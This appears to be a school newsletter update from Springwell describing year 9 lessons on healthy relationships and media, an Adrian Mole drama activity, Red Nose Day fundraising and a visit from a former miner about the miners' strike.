This half term’s Opening Minds topic is Healthy Relationships. Pupils in year 9 had a session with the ladies from Syeda. They talked about the media and their relationship with the media and how everything they see and hear isn’t always true or real. They also discussed self esteem and body image and how it is important to love yourself. Pupils explored Adrian Mole’s bedroom from the 1980s and compared it with a teenager’s bedroom today. Emma, Kiera and Claire acted out some extracts from the Secret Diary of Adrian Mole and compared them to life as a teenager now. Pupils and staff at Springwell have raised over £200 for Red Nose Day. Pupils worse something red, bought noses and sold their baking. The care team had a sponsored make over and the staff did a sweepstake. This afternoon year nine had a visit from an ex miner (Mr Dyson).  He talked about his experience of the miners’ strike and how the aftermath affected him, his family and the community. We are learning facts about the miners’ strike in our elements topic. Geoff used to be a miner.
